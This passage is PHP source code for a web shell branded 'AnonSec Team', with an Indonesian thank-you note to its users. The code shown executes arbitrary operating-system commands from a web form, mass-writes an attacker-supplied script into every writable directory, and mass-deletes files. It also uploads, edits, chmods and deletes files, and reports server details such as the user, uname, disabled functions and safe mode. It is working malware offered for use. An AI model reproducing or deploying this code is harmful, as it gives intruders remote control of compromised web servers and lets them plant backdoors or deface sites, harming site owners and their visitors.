echo "[<font color=green>success</font>] $▚<br>";
file_put_contents($▚, $isi_script);
$▟ = mass_kabeh($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function mass_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<font color=green>success</font>] $dirb/$namafile<br>";
file_put_contents($▚, $isi_script);
}
}
}
}
}
}
if($_POST['start']) {
if($_POST['tipe'] == 'massal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif($_POST['tipe'] == 'biasa') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "<br />$▘
<form method='post'>
<b>Tipe:</b><br>
<div class='custom-control custom-switch'>
<input type='checkbox' id='customSwitch' class='custom-control-input' name='tipe' value='biasa'>
<label class='custom-control-label' for='customSwitch'>Biasa</label>
</div>
<div class='custom-control custom-switch'>
<input type='checkbox' id='customSwitch1' class='custom-control-input' name='tipe' value='massal'>
<label class='custom-control-label' for='customSwitch1'>Massal</label>
</div>
<b><i class='bi bi-folder'></i> Lokasi:</b>
<input class='form-control' type='text' name='d_dir' value='$dir' height='10'>
<b><i class='bi bi-file-earmark'></i> File name:</b>
<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'>
<b><i class='bi bi-file-earmark'></i> Your script:</b>
<textarea class='form-control' rows='7' name='script' placeholder='your secript here'></textarea><br />
<input type='submit' name='start' value='Go' class='btn btn-primary btn-block'>
</form>";
}
}
elseif($_GET['id'] == 'info'){
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
$disfc = "<font color=green>NONE</font>";
} else {
$disfc = "<font color=red>$disfunc</font>";
}
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
echo '<br />'.$▘.'
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<b>Uname: </b><font color=green>".php_uname()."</font><br />";
echo "<b>Software: </b><font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br />";
echo "<b>PHP version: </b><font color=green>".PHP_VERSION."</font> <b>PHP os:</b> <font color=green>".PHP_OS."</font><br />";
echo "<b>Server Ip: </b><font color=green>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br />";
echo "<b>Your Ip: </b><font color=green>".ip()."</font><br />";
echo "<b>User: </b><font color=green>$user</font> ($uid) | <b>Group:</b> <font color=green>$group</font> ($gid)<br />";
echo "<b>Safe Mode: </b>$sm<br />";
echo "<kbd>Disable Function:</kbd><pre>$disfc</pre>";
echo '</div>
</div>
</div>';
}
elseif($_GET['id'] == 'about'){
echo '<br />'.$▘.'
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<img alt='AnonSec Team' class='img-thumbnail rounded mx-auto d-block' src='//unknownsec1337.github.io/AnonSec.jpg' width='150px'>";
echo "<b>- About Me -</b><br />";
echo "Thanks bre dah pake shell nya, jika ada yang error silahkan hubungi email di bawah.<br />Greetz : <a href=''>{ AnonSec Team } - And You</a><br />My email: <a href='mailto:unknownsec1337@gmail.com'>unknownsec1337@gmail.com</a>";
echo '</div>
</div>
</div>';
}
elseif($_GET['id'] == 'cmd') {
echo "<br />$▘
<form method='post'>
<div class='input-group mb-3'>
<input type='text' class='form-control' name='cmd' placeholder='ls -la | id | uname -a'>
<div class='input-group-append'>
<input class='btn btn-primary' type='submit' name='id_cmd' value='Go'>
</form>
</div>
</div>";
if($_POST['id_cmd']) {
$cmd = $_POST['cmd'];
echo "
<div class='container'>
<div class='card text-dark'>
<div class='card-header'>
<kbd><b>~$</b> $cmd</kbd><pre>".x($_POST['cmd'])."</pre>
</div>
</div>
</div>
";
}
}
elseif($_GET['id'] == 'upload'){
echo '<br />'.$▘.'
<form method="post" enctype="multipart/form-data">
<div class="input-group mb-3">
<div class="custom-file">
<label class="custom-file-label" for="inputGroupFile04">
<input class="custom-file-input" id="inputGroupFile04" type="file" name="file" onchange="this.form.submit()" multiple>
</label>
</div>
</div>
</form>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success upload",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed upload",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
}
elseif($_GET['id'] == 'delete'){
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namafile")) {
unlink("".dirname($dir)."/$namafile");
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($▚)) {
echo "[<font color=green>deleted</font>] $▚<br>";
unlink($▚);
$▟ = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
if($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<br />$▘
<form method='post'>
<b><i class='bi bi-folder'></i> Lokasi:</b>
<input class='form-control' type='text' name='d_dir' value='$dir' height='10'>
<b><i class='bi bi-file-earmark'></i> File name:</b>
<div class='input-group mb-3'>
<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'><br>
<div class='input-group-append'>
<input class='btn btn-primary btn-block' type='submit' name='start' value='Go'>
</form>
</div>
</div>";
}
}
}
// akhir tools
if(isset($_GET['filesrc'])){
echo "<br><b>name : </b>".basename($_GET['filesrc']);"</br>";
echo '<textarea class="form-control" rows="7" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea><br />';
}
elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '<br><b>name : </b>'.basename($_POST['path']);'</br>';
//Chmod
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success Change Permission",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change permission",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="perm" type="text" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'"/>
<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
<input class="form-control" type="hidden" name="opt" value="chmod">
<div class="input-group-append">
<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form>
</div>
</div>';
}
//rename folder
elseif($_GET['opt'] == 'btw'){
$cwd = getcwd();
echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
<div class="input-group mb-3">
<input class="form-control" name="name" type="text" value="Folder"/>
<input class="form-control" type="hidden" name="path" value="'.$cwd.'">
<input class="form-control" type="hidden" name="opt" value="delete">
<div class="input-group-append">
<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form>
</div>
</div>';
}
//rename file
elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success change name",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change name",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="newname" type="text" value="'.$_POST['name'].'" />
<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
<input class="form-control" type="hidden" name="opt" value="rename">
<div class="input-group-append">
<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form>
</div>
</div>';
}
//edit file
elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Edit file Success",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed edit file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
fclose($fp);
}
echo '<form method="POST">
<textarea class="form-control" rows="7" name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
<input class="form-control" type="hidden" name="opt" value="edit">
<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form><br />';
}
echo '</center>';
}else{
echo '</table><br /><center>';
//delete dir
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete dir",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete dir",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
//delete file
elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete file",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
}
echo '</center>';
$scandir = scandir($path);
$pa = getcwd();
echo '<div class="container-fluid"><table class="table table-striped table-bordered table-hover bg-white" cellspacing="0" cellpadding="7" width="100%">
<tr>
<th class="text-center bg-dark text-white">Name</th>
<th class="text-center bg-dark text-white">Last edit</th>
<th class="text-center bg-dark text-white">Size</th>
<th class="text-center bg-dark text-white">Permission</th>
<th class="text-center bg-dark text-white">Options</th>
</tr>
</tr>
<tr>';
foreach($scandir as $dir){
$dt = date("Y-m-d g:i:s", filemtime("$path/$dir"));
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "
<tr>
<td><img alt='folder' class='ico' src='//unknownsec1337.github.io/icon/folder.png'><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>$dt</center></td>
<td><center>DIR</center></td>
<td><center>";
if(is_writable("$path/$dir")) echo '<font color="green">';
elseif(!is_readable("$path/$dir")) echo '<font color="red">';
echo p("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
echo "</center></td>
<td>
<form method=\"POST\" action=\"?option&path=$path\">
<div class='input-group mb-3 text-center'>
<select class=\"form-control\" style=\"width: 40%;\" name=\"opt\">
<option selected disabled>Select</option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<div class='input-group-append'>
<input class=\"btn btn-primary btn-block\" type=\"submit\" value=\"Go\"/>
</form>
</div>
</div>
</td>
</tr>";
}
foreach($scandir as $file){
$ft = date("Y-m-d g:i:s", filemtime("$path/$file"));
if(!is_file($path.'/'.$file)) continue;
$s = filesize($path.'/'.$file)/1024;
$s = round($s,3);
if($s >= 1024){
$s = round($s/1024,2).' MB';
}else{
$s = $s.' KB';
}
echo '
<tr>
<td><img alt="file" src="';
$▖ = strtolower(pathinfo($file, PATHINFO_EXTENSION));
if($▖ == "htaccess") {
echo '//unknownsec1337.github.io/icon/htaccess.png';
}elseif($▖ == "png" || $▖ == "jpg" || $▖ == "jpeg" || $▖ == "gif" || $▖ == "ico"){
echo '//unknownsec1337.github.io/icon/images.png';
}elseif($▖ == "php"){
echo '//unknownsec1337.github.io/icon/php.png';
}elseif($▖ == "ini"){
echo '//unknownsec1337.github.io/icon/ini.png';
}elseif($▖ == "html"){
echo '//unknownsec1337.github.io/icon/html.png';
}elseif($▖ == "js"){
echo '//unknownsec1337.github.io/icon/js.png';
}elseif($▖ == "css"){
echo '//unknownsec1337.github.io/icon/css.png';
}elseif($▖ == "json"){
echo '//unknownsec1337.github.io/icon/json.png';
}elseif($▖ == "txt"){
echo '//unknownsec1337.github.io/icon/txt.png';
}elseif($▖ == "sql"){
echo '//unknownsec1337.github.io/icon/sql.png';
}elseif($▖ == "py"){
echo '//unknownsec1337.github.io/icon/py.png';
}elseif($▖ == "pl"){
echo '//unknownsec1337.github.io/icon/pl.png';
}elseif($▖ == "dat"){
echo '//unknownsec1337.github.io/icon/dat.png';
}elseif($▖ == "md"){
echo '//unknownsec1337.github.io/icon/md.png';
}elseif($▖ == "sh"){
echo '//unknownsec1337.github.io/icon/sh.png';
}elseif($▖ == "zip"){
echo '//unknownsec1337.github.io/icon/zip.png';
}elseif($▖ == "rar"){
echo '//unknownsec1337.github.io/icon/rar.png';
}elseif($▖ == "xls"){
echo '//unknownsec1337.github.io/icon/xls.png';
}elseif($▖ == "excel"){
echo '//unknownsec1337.github.io/icon/excel.png';
}elseif($▖ == "word"){
echo '//unknownsec1337.github.io/icon/word.png';
}elseif($▖ == "doc"){
echo '//unknownsec1337.github.io/icon/doc.png';
}elseif($▖ == "mp4"){
echo '//unknownsec1337.github.io/icon/mp4.png';
}elseif($▖ == "mp3"){
echo '//unknownsec1337.github.io/icon/mp3.png';
}elseif($▖ == "pdf"){
echo '//unknownsec1337.github.io/icon/pdf.png';
}elseif($▖ == "csv"){
echo '//unknownsec1337.github.io/icon/csv.png';
}else{
echo '//unknownsec1337.github.io/icon/dflt.png';
}
echo '" class="ico">';
echo "<a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>$ft</center></td>
<td><center>$s</center></td>
<td><center>";
if(is_writable("$path/$file")) echo '<font color="green">';
elseif(!is_readable("$path/$file")) echo '<font color="red">';
echo p("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
echo "</center></td>
<td>
<form method=\"POST\" action=\"?option&path=$path\">
<div class='input-group mb-3 text-center'>
<select class=\"form-control\" style=\"width: 40%;\" name=\"opt\">
<option selected disabled>Select</option>
<option value=\"delete\">Delete</option>
<option value=\"edit\">Edit</option>
<option value=\"rename\">Rename</option>
<option value=\"chmod\">Chmod</option>
<option value=\"download\">Download</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<div class='input-group-append'>
<input class=\"btn btn-primary btn-block\" type=\"submit\" value=\"Go\"/>
</form>
</div>
</div>
</td>
</tr>";
}
}
echo "
</table>
<div class='card text-dark'>
<div class='card-header text-center'>
<kbd>Copyright © ".date("Y")." - <a href=''>$▛</a></kbd>
</div>
</div>
<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>
<script src='//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js'></script>
<script src='//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>
</body>
</html>";
?>